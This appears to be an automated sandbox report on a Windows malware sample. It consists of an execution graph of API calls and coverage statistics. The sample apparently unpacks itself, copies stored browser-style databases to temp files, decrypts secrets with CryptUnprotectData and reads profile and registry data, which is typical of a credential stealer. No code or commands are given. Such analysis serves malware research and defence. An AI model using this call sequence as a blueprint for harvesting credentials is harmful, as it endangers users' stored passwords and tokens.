                                                                                                                                                                                                              • Opcode ID: 89f5f138fa4584c3556b068ee8cd23851e0df504f4d90f14630ecf18233f0f46
                                                                                                                                                                                                              • Instruction ID: 9c1939302144d33f55596422a270fabaf29991f2d0ddb876a91cd11bf1c2274a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 89f5f138fa4584c3556b068ee8cd23851e0df504f4d90f14630ecf18233f0f46
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DCD01238224208DFCB00AF24F488C253BB9FB88A2031040A4EC0D8B32ACB35EC81CA40

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:3.5%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:50.9%
                                                                                                                                                                                                              Signature Coverage:22.1%
                                                                                                                                                                                                              Total number of Nodes:782
                                                                                                                                                                                                              Total number of Limit Nodes:83
                                                                                                                                                                                                              execution_graph 29163 279b079 20 API calls 29166 27e507d 24 API calls 29167 27a807c 23 API calls 29054 27b6e71 21 API calls 29169 27b6871 8 API calls 29055 27b0670 _allmul _allmul _allmul _alldvrm 29173 27af86a 31 API calls 29174 2794c6d 17 API calls 29057 27c3e6b 20 API calls 29175 27d2864 25 API calls 29060 2795e5a 28 API calls 28724 279105d VirtualFree 29179 27d7452 19 API calls 29064 27f9238 LoadLibraryA GetProcAddress VirtualProtect VirtualProtect 28994 2793c40 28995 2791b6a 2 API calls 28994->28995 28996 2793c50 28995->28996 28997 2793dfa 28996->28997 29030 2791000 GetProcessHeap RtlAllocateHeap 28996->29030 28999 2793c62 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 29000 27e4bec 89 API calls 28999->29000 29003 2793c9a 29000->29003 29001 2793dec DeleteFileW 29002 2791011 3 API calls 29001->29002 29002->28997 29003->29001 29004 2793de3 29003->29004 29031 2791000 GetProcessHeap RtlAllocateHeap 29003->29031 29005 27e3848 76 API calls 29004->29005 29005->29001 29007 2793cce 29032 27b02ec 107 API calls 29007->29032 29009 2793da8 29035 27afb92 93 API calls 29009->29035 29010 2791fa7 19 API calls 29024 2793cd9 29010->29024 29012 2793db1 lstrlen 29013 2793db9 29012->29013 29014 2793ddc 29012->29014 29036 2791798 lstrlen 29013->29036 29015 2791011 3 API calls 29014->29015 29015->29004 29017 2793dc8 29037 2791798 lstrlen 29017->29037 29018 2793d2b lstrlen 29020 2793d35 lstrlen 29018->29020 29018->29024 29020->29024 29021 2793dd2 29038 2791798 lstrlen 29021->29038 29024->29009 29024->29010 29024->29018 29033 2791000 GetProcessHeap RtlAllocateHeap 29024->29033 29034 27b02ec 107 API calls 29024->29034 29026 2793d46 wsprintfA lstrlen 29027 2793d83 lstrcat 29026->29027 29028 2793d71 29026->29028 29029 2791011 3 API calls 29027->29029 29028->29027 29029->29024 29030->28999 29031->29007 29032->29024 29033->29026 29034->29024 29035->29012 29036->29017 29037->29021 29038->29014 29180 2794440 24 API calls 29182 27b6440 107 API calls 29185 27a943d 34 API calls 28449 279f433 28450 279f445 28449->28450 28455 27a23b9 28450->28455 28453 279f47c 28454 279f490 28453->28454 28463 279e206 58 API calls 28453->28463 28456 27a23d3 28455->28456 28458 27a2473 28455->28458 28459 27a2431 28456->28459 28467 27a3451 43 API calls 28456->28467 28458->28453 28459->28458 28464 27963f7 28459->28464 28460 27a240f 28460->28459 28468 27a235a 17 API calls 28460->28468 28463->28454 28469 279bafc 28464->28469 28465 2796400 28465->28458 28467->28460 28468->28459 28480 279b609 28469->28480 28471 279bb3f GetFileAttributesW 28472 279bb4b 28471->28472 28478 279bb14 28471->28478 28473 279bb5b 28472->28473 28475 279bb7d 28472->28475 28483 279a1c6 18 API calls 28473->28483 28474 279bb25 DeleteFileW 28474->28475 28474->28478 28484 279a2aa 17 API calls 28475->28484 28478->28471 28478->28473 28478->28474 28479 279bb1a 28478->28479 28479->28465 28485 279a08a 28480->28485 28482 279b60f 28482->28478 28483->28479 28484->28479 28486 279a0a4 28485->28486 28488 279a0aa 28486->28488 28489 2796a81 28486->28489 28488->28482 28490 2796a8f 28489->28490 28491 2796a95 memset 28490->28491 28492 2796aa4 28490->28492 28491->28492 28492->28488 29188 279482b 14 API calls 29192 27ce024 93 API calls 29194 279581f _alldiv _allrem _allmul 29072 27bf21c 23 API calls 28979 279a40e 28980 279a4a2 28979->28980 28985 279a426 28979->28985 28981 279a4cc ReadFile 28980->28981 28983 279a524 28980->28983 28990 279a501 28980->28990 28981->28980 28981->28983 28982 279a469 memcpy 28982->28980 28993 279a2aa 17 API calls 28983->28993 28984 279a44a memcpy 28988 279a45d 28984->28988 28985->28980 28985->28982 28985->28984 28987 279a532 28987->28988 28989 279a53e memset 28987->28989 28989->28988 28992 279a1c6 18 API calls 28990->28992 28992->28988 28993->28987 29075 27b0e0c 22 API calls 29076 279ca01 _allmul _alldiv _allmul _alldiv 29201 27c9000 28 API calls 29202 27d5401 memset memcpy memcpy memset memcpy 29048 2794406 29049 2792e30 22 API calls 29048->29049 29050 2794429 29049->29050 29051 2792e30 22 API calls 29050->29051 29052 279443a 29051->29052 28192 27928f8 28193 2792ac8 28192->28193 28194 2792900 28192->28194 28224 27e3848 28193->28224 28232 2791000 GetProcessHeap RtlAllocateHeap 28194->28232 28198 279290e 28233 27b02ec 107 API calls 28198->28233 28202 2792a8b 28237 27afb92 93 API calls 28202->28237 28204 2792a98 lstrlen 28205 2792ac1 28204->28205 28206 2792aa4 28204->28206 28207 2791011 3 API calls 28205->28207 28238 2791798 lstrlen 28206->28238 28207->28193 28209 2792ab1 28239 2791798 lstrlen 28209->28239 28211 2792ab9 28240 2791798 lstrlen 28211->28240 28213 2791fa7 19 API calls 28218 2792919 28213->28218 28214 27929da lstrlen 28215 27929eb lstrlen 28214->28215 28214->28218 28215->28218 28218->28202 28218->28213 28218->28214 28234 2791000 GetProcessHeap RtlAllocateHeap 28218->28234 28235 2792112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 28218->28235 28236 27b02ec 107 API calls 28218->28236 28220 2792a25 wsprintfA lstrlen 28221 2792a58 28220->28221 28222 2792a6a lstrcat 28220->28222 28221->28222 28223 2791011 3 API calls 28222->28223 28223->28218 28241 27e37cb 28224->28241 28227 2791011 28257 2791162 VirtualQuery 28227->28257 28230 279102d 28231 279101d GetProcessHeap RtlFreeHeap 28231->28230 28232->28198 28233->28218 28234->28218 28235->28220 28236->28218 28237->28204 28238->28209 28239->28211 28240->28205 28242 27e37d6 28241->28242 28243 2792ad1 DeleteFileW 28241->28243 28253 27995b5 17 API calls 28242->28253 28243->28227 28245 27e37db 28246 27e37df 28245->28246 28249 27e37eb 28245->28249 28254 27e4da0 17 API calls 28246->28254 28248 27e3834 28256 27e3865 71 API calls 28248->28256 28249->28248 28251 27e381f 28249->28251 28255 2798795 22 API calls 28251->28255 28253->28245 28254->28243 28255->28243 28256->28243 28258 2791019 28257->28258 28258->28230 28258->28231 29078 27c9ef6 125 API calls 29204 2794cf5 memset 28560 2799ee8 28561 2799ef1 RtlFreeHeap 28560->28561 28564 2799f1a 28560->28564 28562 2799f02 28561->28562 28561->28564 28565 2797f70 17 API calls 28562->28565 28565->28564 29206 279f4ec 20 API calls 29080 27bc6da 23 API calls 29207 27c70de 24 API calls 29212 2796eb7 22 API calls 29213 27a5cca 32 API calls 29084 27bfaca _allmul strcspn 29214 27e34ca 57 API calls 29217 2795cc5 22 API calls 29089 27b12bb _allmul _allmul _allmul _alldvrm _allmul 29219 27a78b9 33 API calls 29092 27996bc _alldiv _alldiv _alldiv _alldiv _allmul 29220 27948b1 22 API calls 29221 2796eb7 24 API calls 28493 2792cb5 28494 2792cbe 28493->28494 28495 2791953 6 API calls 28494->28495 28496 2792cc3 28495->28496 28497 2792e17 28496->28497 28498 2791953 6 API calls 28496->28498 28499 2792cd9 28498->28499 28522 2791000 GetProcessHeap RtlAllocateHeap 28499->28522 28501 2792ce9 28523 2791000 GetProcessHeap RtlAllocateHeap 28501->28523 28503 2792cf9 28504 2791b6a 2 API calls 28503->28504 28505 2792d04 28504->28505 28506 2792ded 28505->28506 28507 2792d0c GetPrivateProfileSectionNamesW 28505->28507 28508 2791011 3 API calls 28506->28508 28507->28506 28520 2792d22 28507->28520 28509 2792e02 28508->28509 28510 2791011 3 API calls 28509->28510 28512 2792e09 28510->28512 28511 2792d3f StrStrIW 28513 2792d53 GetPrivateProfileStringW 28511->28513 28514 2792dd7 lstrlenW 28511->28514 28515 2791011 3 API calls 28512->28515 28513->28514 28516 2792d72 GetPrivateProfileIntW 28513->28516 28514->28506 28514->28520 28517 2792e10 28515->28517 28516->28520 28518 2791011 3 API calls 28517->28518 28518->28497 28519 2791953 6 API calls 28519->28520 28520->28506 28520->28511 28520->28514 28520->28519 28521 2791011 3 API calls 28520->28521 28521->28520 28522->28501 28523->28503 29222 27ab0aa 84 API calls 29096 27956a2 _allrem 28566 2792ea5 25 API calls 29223 27ab8a6 90 API calls 28567 27924a4 28570 2792198 RtlZeroMemory GetVersionExW 28567->28570 28571 27921cb LoadLibraryW 28570->28571 28573 279249b 28571->28573 28574 27921fc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 28571->28574 28575 2792492 FreeLibrary 28574->28575 28582 2792244 28574->28582 28575->28573 28576 279247b 28576->28575 28577 27922e1 RtlCompareMemory 28577->28582 28578 2792365 RtlCompareMemory 28578->28582 28579 2791953 6 API calls 28579->28582 28580 2791011 GetProcessHeap RtlFreeHeap VirtualQuery 28580->28582 28581 27923f8 StrStrIW 28581->28582 28582->28575 28582->28576 28582->28577 28582->28578 28582->28579 28582->28580 28582->28581 28583 27917c0 9 API calls 28582->28583 28583->28582 29224 27b7ca6 19 API calls 28587 2799ea7 RtlAllocateHeap 28588 2799ed9 28587->28588 28589 2799ec1 28587->28589 28591 2797f70 17 API calls 28589->28591 28591->28588 28611 2793098 28612 2791b6a 2 API calls 28611->28612 28614 27930af 28612->28614 28613 27933a9 28614->28613 28635 2791000 GetProcessHeap RtlAllocateHeap 28614->28635 28616 27930ed GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 28636 27e4bec 28616->28636 28618 279339b DeleteFileW 28619 2791011 3 API calls 28618->28619 28619->28613 28620 2793126 28620->28618 28621 2793392 28620->28621 28647 27b02ec 107 API calls 28620->28647 28623 27e3848 76 API calls 28621->28623 28623->28618 28624 2793381 28650 27afb92 93 API calls 28624->28650 28626 2791fa7 19 API calls 28632 2793155 28626->28632 28627 27932cd CryptUnprotectData 28627->28632 28628 279319c RtlCompareMemory 28628->28627 28628->28632 28630 27931d0 RtlZeroMemory 28648 2791000 GetProcessHeap RtlAllocateHeap 28630->28648 28632->28624 28632->28626 28632->28627 28632->28628 28632->28630 28633 2791798 lstrlen 28632->28633 28634 2791011 3 API calls 28632->28634 28649 27b02ec 107 API calls 28632->28649 28633->28632 28634->28632 28635->28616 28651 27e307c 28636->28651 28638 27e4c01 28645 27e4c44 28638->28645 28661 27ac54d memset 28638->28661 28640 27e4c18 28662 27ac871 21 API calls 28640->28662 28642 27e4c2a 28663 27ac518 19 API calls 28642->28663 28644 27e4c33 28644->28645 28664 27e486f 89 API calls 28644->28664 28645->28620 28647->28632 28648->28632 28649->28632 28650->28621 28652 27e3095 28651->28652 28656 27e308e 28651->28656 28653 27e30ad 28652->28653 28678 27966ce 17 API calls 28652->28678 28655 27e30ed memset 28653->28655 28653->28656 28657 27e3108 28655->28657 28656->28638 28658 27e3116 28657->28658 28679 279c59d 17 API calls 28657->28679 28658->28656 28665 2796512 28658->28665 28661->28640 28662->28642 28663->28644 28664->28645 28680 279685c 28665->28680 28667 279651d 28667->28656 28668 2796519 28668->28667 28669 279bfec GetSystemInfo 28668->28669 28683 27965bd 28669->28683 28671 279c00e 28672 27965bd 16 API calls 28671->28672 28673 279c01a 28672->28673 28674 27965bd 16 API calls 28673->28674 28675 279c026 28674->28675 28676 27965bd 16 API calls 28675->28676 28677 279c032 28676->28677 28677->28656 28678->28653 28679->28658 28681 27e307c 17 API calls 28680->28681 28682 2796861 28681->28682 28682->28668 28684 27e307c 17 API calls 28683->28684 28685 27965c2 28684->28685 28685->28671 29098 27a6698 30 API calls 29099 279629a 23 API calls 29227 27d2c9e 115 API calls 29231 27d348f 27 API calls 29107 27a0284 39 API calls 29235 27ac97b memcpy 28524 2792f77 28529 2792e30 StrStrIW 28524->28529 28527 2792e30 22 API calls 28528 2792fab 28527->28528 28530 2792ebc 28529->28530 28531 2792e57 28529->28531 28555 2791000 GetProcessHeap RtlAllocateHeap 28530->28555 28532 27919e5 9 API calls 28531->28532 28534 2792e68 28532->28534 28534->28530 28556 2791bc5 10 API calls 28534->28556 28535 2792ed0 RegOpenKeyExW 28536 2792f68 28535->28536 28554 2792eee 28535->28554 28537 2791011 3 API calls 28536->28537 28541 2792f6f 28537->28541 28539 2792f50 RegEnumKeyExW 28540 2792f5e RegCloseKey 28539->28540 28539->28554 28540->28536 28541->28527 28542 2792e75 28543 2792eb5 28542->28543 28546 2791afe 10 API calls 28542->28546 28545 2791011 3 API calls 28543->28545 28544 2791953 6 API calls 28544->28554 28545->28530 28547 2792e83 28546->28547 28550 279199d 9 API calls 28547->28550 28552 2792e91 28547->28552 28548 279199d 9 API calls 28548->28554 28549 2791011 3 API calls 28549->28543 28550->28552 28551 2792e30 18 API calls 28551->28554 28552->28549 28553 2791011 3 API calls 28553->28554 28554->28539 28554->28544 28554->28548 28554->28551 28554->28553 28555->28535 28556->28542 29109 279ab68 22 API calls 29238 27c5d6f 20 API calls 29239 27aa16f 33 API calls 29111 27b7f67 24 API calls 29112 27c7762 memset memset memcpy 29241 279a558 18 API calls 29242 27be558 22 API calls 29115 27af74d 18 API calls 29243 27be141 18 API calls 29117 27b6340 92 API calls 29121 27a0f3e 60 API calls 28343 279413e 28346 2794045 28343->28346 28365 2793fdc 28346->28365 28349 2793fdc 50 API calls 28350 279407a 28349->28350 28351 2793fdc 50 API calls 28350->28351 28352 279408d 28351->28352 28353 2793fdc 50 API calls 28352->28353 28354 27940a0 28353->28354 28355 2793fdc 50 API calls 28354->28355 28356 27940b3 28355->28356 28357 2793fdc 50 API calls 28356->28357 28358 27940c6 28357->28358 28359 2793fdc 50 API calls 28358->28359 28360 27940d9 28359->28360 28361 2793fdc 50 API calls 28360->28361 28362 27940ec 28361->28362 28363 2793fdc 50 API calls 28362->28363 28364 27940ff 28363->28364 28366 2791afe 10 API calls 28365->28366 28367 2793fea 28366->28367 28368 279403f 28367->28368 28369 279199d 9 API calls 28367->28369 28368->28349 28370 2793ff8 28369->28370 28376 2793ed9 28370->28376 28373 2794038 28375 2791011 3 API calls 28373->28375 28374 2791d4a 18 API calls 28374->28373 28375->28368 28377 2793eed 28376->28377 28378 2793fd1 28376->28378 28377->28378 28398 2791000 GetProcessHeap RtlAllocateHeap 28377->28398 28378->28373 28378->28374 28380 2793f01 PathCombineW FindFirstFileW 28381 2793fca 28380->28381 28382 2793f27 28380->28382 28385 2791011 3 API calls 28381->28385 28383 2793f78 lstrcmpiW 28382->28383 28384 2793f32 lstrcmpiW 28382->28384 28399 2791000 GetProcessHeap RtlAllocateHeap 28382->28399 28383->28382 28386 2793faf FindNextFileW 28383->28386 28384->28386 28387 2793f42 lstrcmpiW 28384->28387 28385->28378 28386->28382 28389 2793fc3 FindClose 28386->28389 28387->28386 28390 2793f56 28387->28390 28389->28381 28416 2791000 GetProcessHeap RtlAllocateHeap 28390->28416 28391 2793f92 PathCombineW 28400 2793e04 28391->28400 28394 2793f60 PathCombineW 28396 2793ed9 23 API calls 28394->28396 28395 2793f76 28397 2791011 3 API calls 28395->28397 28396->28395 28397->28386 28398->28380 28399->28391 28417 2791b6a 28400->28417 28402 2793e0f 28403 2793ec7 28402->28403 28423 2791c31 CreateFileW 28402->28423 28403->28395 28410 2793ebf 28411 2791011 3 API calls 28410->28411 28411->28403 28412 2793ea8 28414 2791011 3 API calls 28412->28414 28413 2793e6c RtlCompareMemory 28413->28412 28415 2793e7e CryptUnprotectData 28413->28415 28414->28410 28415->28412 28416->28394 28418 2791b99 28417->28418 28419 2791b6f 28417->28419 28418->28402 28419->28418 28420 2791b76 CreateFileW 28419->28420 28421 2791b8d CloseHandle 28420->28421 28422 2791b95 28420->28422 28421->28422 28422->28402 28424 2791c98 28423->28424 28425 2791c53 GetFileSize 28423->28425 28424->28403 28434 2792fb1 28424->28434 28426 2791c90 CloseHandle 28425->28426 28427 2791c63 28425->28427 28426->28424 28446 2791000 GetProcessHeap RtlAllocateHeap 28427->28446 28429 2791c6b ReadFile 28430 2791c80 28429->28430 28431 2791c87 28429->28431 28430->28426 28430->28431 28432 2791011 3 API calls 28431->28432 28433 2791c8e 28432->28433 28433->28426 28435 2792fb8 StrStrIA 28434->28435 28436 2792ff2 28434->28436 28435->28436 28437 2792fcd lstrlen StrStrIA 28435->28437 28436->28403 28440 279123b lstrlen 28436->28440 28437->28436 28438 2792fe7 28437->28438 28447 279190b 6 API calls 28438->28447 28441 279129b 28440->28441 28442 2791256 CryptStringToBinaryA 28440->28442 28441->28410 28441->28412 28441->28413 28442->28441 28443 2791272 28442->28443 28448 2791000 GetProcessHeap RtlAllocateHeap 28443->28448 28445 279127e CryptStringToBinaryA 28445->28441 28446->28429 28447->28436 28448->28445 29122 27a7b3d 18 API calls 29123 27aff32 21 API calls 29246 27bf130 22 API calls 29247 27a9534 39 API calls 29124 27c072d 19 API calls 29248 27a0128 36 API calls 29125 279cb2a _allmul _allmul 29250 2799925 18 API calls 29128 27dc322 27 API calls 28686 279411b 28687 2794045 50 API calls 28686->28687 28688 279412b 28687->28688 28689 2794045 50 API calls 28688->28689 28690 279413b 28689->28690 29252 27a84a7 30 API calls 29130 27b13ca 105 API calls 28881 2792b15 28882 2791953 6 API calls 28881->28882 28883 2792b1f FindFirstFileW 28882->28883 28885 2792c5c 28883->28885 28893 2792b4e 28883->28893 28886 2791011 3 API calls 28885->28886 28888 2792c63 28886->28888 28887 2792b59 lstrcmpiW 28890 2792c3d FindNextFileW 28887->28890 28891 2792b71 lstrcmpiW 28887->28891 28892 2791011 3 API calls 28888->28892 28889 2791953 6 API calls 28889->28893 28890->28893 28894 2792c51 FindClose 28890->28894 28891->28890 28891->28893 28895 2792c6a 28892->28895 28893->28887 28893->28889 28896 279199d 9 API calls 28893->28896 28897 27919b4 lstrlenW 28893->28897 28903 279199d 9 API calls 28893->28903 28905 2791011 3 API calls 28893->28905 28894->28885 28898 2792bdf StrStrIW 28896->28898 28897->28893 28899 2792bf1 28898->28899 28900 2792c10 StrStrIW 28898->28900 28899->28900 28901 2791cf7 GetProcessHeap RtlAllocateHeap lstrlenW RtlComputeCrc32 28899->28901 28902 2791011 3 API calls 28899->28902 28906 279278e 41 API calls 28899->28906 28900->28899 28901->28899 28902->28890 28903->28893 28905->28893 28906->28900 28907 2793717 28908 2791b6a 2 API calls 28907->28908 28910 279372e 28908->28910 28909 2793c23 28910->28909 28957 2791000 GetProcessHeap RtlAllocateHeap 28910->28957 28912 279376c GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 28913 27937a8 28912->28913 28914 279379e 28912->28914 28916 27e4bec 89 API calls 28913->28916 28958 279349b 31 API calls 28914->28958 28919 27937b3 28916->28919 28917 2793c15 DeleteFileW 28918 2791011 3 API calls 28917->28918 28918->28909 28919->28917 28920 2793c0c 28919->28920 28959 2791000 GetProcessHeap RtlAllocateHeap 28919->28959 28921 27e3848 76 API calls 28920->28921 28921->28917 28923 27937e3 28960 27b02ec 107 API calls 28923->28960 28925 2793bcc 28965 27afb92 93 API calls 28925->28965 28927 2793bd9 lstrlen 28928 2793c05 28927->28928 28929 2793be5 28927->28929 28931 2791011 3 API calls 28928->28931 28966 2791798 lstrlen 28929->28966 28931->28920 28933 2793bf3 28967 2791798 lstrlen 28933->28967 28934 2793833 RtlCompareMemory 28935 2793a37 CryptUnprotectData 28934->28935 28945 27937ee 28934->28945 28935->28945 28937 2793bfc 28968 2791798 lstrlen 28937->28968 28939 2793867 RtlZeroMemory 28961 2791000 GetProcessHeap RtlAllocateHeap 28939->28961 28941 2791fa7 19 API calls 28941->28945 28942 2791011 3 API calls 28942->28945 28943 2793b0f lstrlen 28944 2793b21 lstrlen 28943->28944 28943->28945 28944->28945 28945->28925 28945->28934 28945->28935 28945->28939 28945->28941 28945->28942 28945->28943 28946 2791000 GetProcessHeap RtlAllocateHeap 28945->28946 28947 2793987 lstrlen 28945->28947 28951 2793ba3 lstrcat 28945->28951 28962 2792112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 28945->28962 28963 2792112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 28945->28963 28964 27b02ec 107 API calls 28945->28964 28946->28945 28947->28945 28950 2793999 lstrlen 28947->28950 28949 2793b66 wsprintfA lstrlen 28949->28945 28949->28951 28950->28945 28951->28945 28953 27939de wsprintfA lstrlen 28954 2793a1b lstrcat 28953->28954 28955 2793a0d 28953->28955 28956 2791011 3 API calls 28954->28956 28955->28954 28956->28945 28957->28912 28958->28913 28959->28923 28960->28945 28961->28945 28962->28953 28963->28949 28964->28945 28965->28927 28966->28933 28967->28937 28968->28928 29131 27b6b14 memset memcpy _allmul 28976 2794108 28977 2794045 50 API calls 28976->28977 28978 2794118 28977->28978 29132 27b5f08 113 API calls 29134 27c6f06 24 API calls 29039 27f9304 29041 27f9344 29039->29041 29040 27f9584 29040->29040 29041->29040 29042 27f94da LoadLibraryA 29041->29042 29045 27f951f VirtualProtect VirtualProtect 29041->29045 29043 27f94f1 29042->29043 29043->29041 29046 27f9503 GetProcAddress 29043->29046 29045->29040 29046->29043 29047 27f9519 29046->29047 29257 27a6d01 _allmul 28259 27947fa 28266 279479c 28259->28266 28262 279479c 23 API calls 28263 2794813 28262->28263 28264 279479c 23 API calls 28263->28264 28265 279481f 28264->28265 28275 2791afe 28266->28275 28269 27947f1 28269->28262 28271 27947ea 28273 2791011 3 API calls 28271->28273 28272 27947bf 28272->28271 28288 2791d4a 28272->28288 28273->28269 28316 2791000 GetProcessHeap RtlAllocateHeap 28275->28316 28277 2791b0d SHGetFolderPathW 28278 2791b20 28277->28278 28279 2791b63 28277->28279 28280 2791011 3 API calls 28278->28280 28279->28269 28283 279199d 28279->28283 28282 2791b28 28280->28282 28282->28279 28317 27919e5 28282->28317 28332 2791953 28283->28332 28285 27919a6 28286 2791011 3 API calls 28285->28286 28287 27919af 28286->28287 28287->28272 28289 2791d62 28288->28289 28290 2791eb4 28288->28290 28289->28290 28338 27919b4 28289->28338 28290->28272 28293 2791d79 28295 2791953 6 API calls 28293->28295 28294 2791d8b 28296 2791953 6 API calls 28294->28296 28297 2791d83 28295->28297 28296->28297 28297->28290 28298 2791da3 FindFirstFileW 28297->28298 28299 2791ead 28298->28299 28306 2791dba 28298->28306 28300 2791011 3 API calls 28299->28300 28300->28290 28301 2791dc5 lstrcmpiW 28303 2791ddd lstrcmpiW 28301->28303 28304 2791e8e FindNextFileW 28301->28304 28302 2791953 6 API calls 28302->28306 28303->28304 28313 2791df5 28303->28313 28305 2791ea2 FindClose 28304->28305 28304->28306 28305->28299 28306->28301 28306->28302 28308 279199d 9 API calls 28306->28308 28307 27919b4 lstrlenW 28307->28313 28309 2791e54 lstrcmpiW 28308->28309 28309->28313 28311 2791011 3 API calls 28311->28304 28312 2791953 6 API calls 28312->28313 28313->28307 28313->28311 28313->28312 28314 279199d 9 API calls 28313->28314 28315 2791d4a 12 API calls 28313->28315 28342 2791cf7 GetProcessHeap RtlAllocateHeap lstrlenW RtlComputeCrc32 28313->28342 28314->28313 28315->28313 28316->28277 28318 27919fa RegOpenKeyExW 28317->28318 28319 27919f7 28317->28319 28320 2791a28 RegQueryValueExW 28318->28320 28321 2791aa2 28318->28321 28319->28318 28323 2791a94 RegCloseKey 28320->28323 28324 2791a46 28320->28324 28322 2791ab9 28321->28322 28325 27919e5 5 API calls 28321->28325 28322->28282 28323->28321 28323->28322 28324->28323 28331 2791000 GetProcessHeap RtlAllocateHeap 28324->28331 28325->28322 28327 2791a61 RegQueryValueExW 28328 2791a8b 28327->28328 28330 2791a7f 28327->28330 28329 2791011 3 API calls 28328->28329 28329->28330 28330->28323 28331->28327 28333 2791964 lstrlenW lstrlenW 28332->28333 28337 2791000 GetProcessHeap RtlAllocateHeap 28333->28337 28336 2791986 lstrcatW lstrcatW 28336->28285 28337->28336 28339 27919bc 28338->28339 28340 27919d4 28338->28340 28339->28340 28341 27919c3 lstrlenW 28339->28341 28340->28293 28340->28294 28341->28340 28342->28313 29259 27949f1 13 API calls 29139 27a9ff0 32 API calls 29140 27b13ca 102 API calls 29260 279d1f7 memset _allmul _allmul 29262 279c9ea _allmul _alldiv 29263 27e55eb IsProcessorFeaturePresent 29265 27999e1 strncmp 28592 27943d9 28599 2794317 _alloca_probe RegOpenKeyW 28592->28599 28595 2794317 25 API calls 28596 27943f5 28595->28596 28597 2794317 25 API calls 28596->28597 28598 2794403 28597->28598 28600 27943cf 28599->28600 28601 2794343 RegEnumKeyExW 28599->28601 28600->28595 28602 27943c4 RegCloseKey 28601->28602 28606 279436d 28601->28606 28602->28600 28603 2791953 6 API calls 28603->28606 28604 279199d 9 API calls 28604->28606 28606->28603 28606->28604 28607 2791011 3 API calls 28606->28607 28610 279418a 16 API calls 28606->28610 28608 279439b RegEnumKeyExW 28607->28608 28608->28606 28609 27943c3 28608->28609 28609->28602 28610->28606 29143 279ebd9 37 API calls 28691 27963dd 28694 279b87b 28691->28694 28692 27963f4 28695 279b88d memset 28694->28695 28696 279b8e5 28695->28696 28696->28695 28698 279b609 memset 28696->28698 28699 279ba3c 28696->28699 28700 279b965 CreateFileW 28696->28700 28703 279ba14 28696->28703 28704 279ba41 28696->28704 28709 279b64b 18 API calls 28696->28709 28710 279bb9f 18 API calls 28696->28710 28711 279a2aa 17 API calls 28696->28711 28698->28696 28699->28692 28700->28696 28712 279a1c6 18 API calls 28703->28712 28714 27e52ae 28704->28714 28706 279ba32 28713 27e4db2 17 API calls 28706->28713 28709->28696 28710->28696 28711->28696 28712->28706 28713->28699 28715 27e52bb 28714->28715 28716 27e52d1 28715->28716 28718 27cba08 _allmul 28715->28718 28716->28699 28718->28716 28725 27915dd 28726 2791600 28725->28726 28727 27915f3 lstrlen 28725->28727 28736 2791000 GetProcessHeap RtlAllocateHeap 28726->28736 28727->28726 28729 2791608 lstrcat 28730 279163d lstrcat 28729->28730 28731 2791644 28729->28731 28730->28731 28737 2791333 28731->28737 28734 2791011 3 API calls 28735 2791667 28734->28735 28736->28729 28760 2791000 GetProcessHeap RtlAllocateHeap 28737->28760 28739 2791357 28761 279106c lstrlen MultiByteToWideChar 28739->28761 28741 2791366 28762 27912a3 RtlZeroMemory 28741->28762 28744 27913b8 RtlZeroMemory 28748 27913ed 28744->28748 28745 2791011 3 API calls 28746 27915d2 28745->28746 28746->28734 28747 27915b5 28747->28745 28748->28747 28764 2791000 GetProcessHeap RtlAllocateHeap 28748->28764 28750 27914a7 wsprintfW 28751 27914c9 28750->28751 28759 27915a1 28751->28759 28765 2791000 GetProcessHeap RtlAllocateHeap 28751->28765 28752 2791011 3 API calls 28752->28747 28754 279159a 28757 2791011 3 API calls 28754->28757 28755 2791533 28755->28754 28766 279104c VirtualAlloc 28755->28766 28757->28759 28758 279158a RtlMoveMemory 28758->28754 28759->28752 28760->28739 28761->28741 28763 27912c5 28762->28763 28763->28744 28763->28747 28764->28750 28765->28755 28766->28758 28969 2799fc8 28970 2799fd8 28969->28970 28972 2799fd3 28969->28972 28971 2799ff4 HeapCreate 28970->28971 28970->28972 28971->28972 28973 279a004 28971->28973 28975 2797f70 17 API calls 28973->28975 28975->28972 29145 27b13ca 103 API calls 29267 27e3dc8 24 API calls 29150 27c73c4 22 API calls 29268 27b9dbc 25 API calls 29152 27d33b7 27 API calls 29153 27d53ad memset memcpy memset memcpy 29271 27a11a0 43 API calls 29154 27b8ba6 7 API calls 29272 2791198 GetProcessHeap RtlAllocateHeap CryptBinaryToStringA CryptBinaryToStringA 29155 279bf9a _alldiv 28719 2791b9d 28720 2791bc1 28719->28720 28721 2791ba2 28719->28721 28721->28720 28722 2791ba9 GetFileAttributesW 28721->28722 28723 2791bb5 28722->28723 28767 279639e 28771 279b1e3 28767->28771 28791 279b1e5 28767->28791 28768 27963b2 28772 279b1e5 28771->28772 28773 279b214 28772->28773 28827 279aeea 28772->28827 28775 279b233 28773->28775 28778 279b28f 28773->28778 28845 279ae65 28773->28845 28775->28778 28811 279a7ae 28775->28811 28778->28768 28779 279b26d 28851 279a1c6 18 API calls 28779->28851 28780 279b2d6 28824 2796a5a 28780->28824 28786 279b310 CreateFileMappingW 28787 279b32b MapViewOfFile 28786->28787 28788 279b37e 28786->28788 28787->28788 28789 279b2e8 28787->28789 28852 279a1c6 18 API calls 28788->28852 28789->28778 28789->28786 28792 279b20d 28791->28792 28793 279b214 28791->28793 28794 279aeea 27 API calls 28792->28794 28795 279b233 28793->28795 28796 279ae65 22 API calls 28793->28796 28803 279b28f 28793->28803 28794->28793 28797 279a7ae 18 API calls 28795->28797 28795->28803 28796->28795 28800 279b267 28797->28800 28798 279b2d6 28799 2796a5a 17 API calls 28798->28799 28804 279b2e8 28799->28804 28800->28798 28801 279a67c 22 API calls 28800->28801 28800->28803 28806 279b26d 28800->28806 28805 279b2be 28801->28805 28803->28768 28804->28803 28807 279b310 CreateFileMappingW 28804->28807 28805->28798 28805->28806 28876 279a1c6 18 API calls 28806->28876 28808 279b32b MapViewOfFile 28807->28808 28809 279b37e 28807->28809 28808->28804 28808->28809 28877 279a1c6 18 API calls 28809->28877 28813 279a7c7 28811->28813 28812 279a805 28812->28778 28812->28779 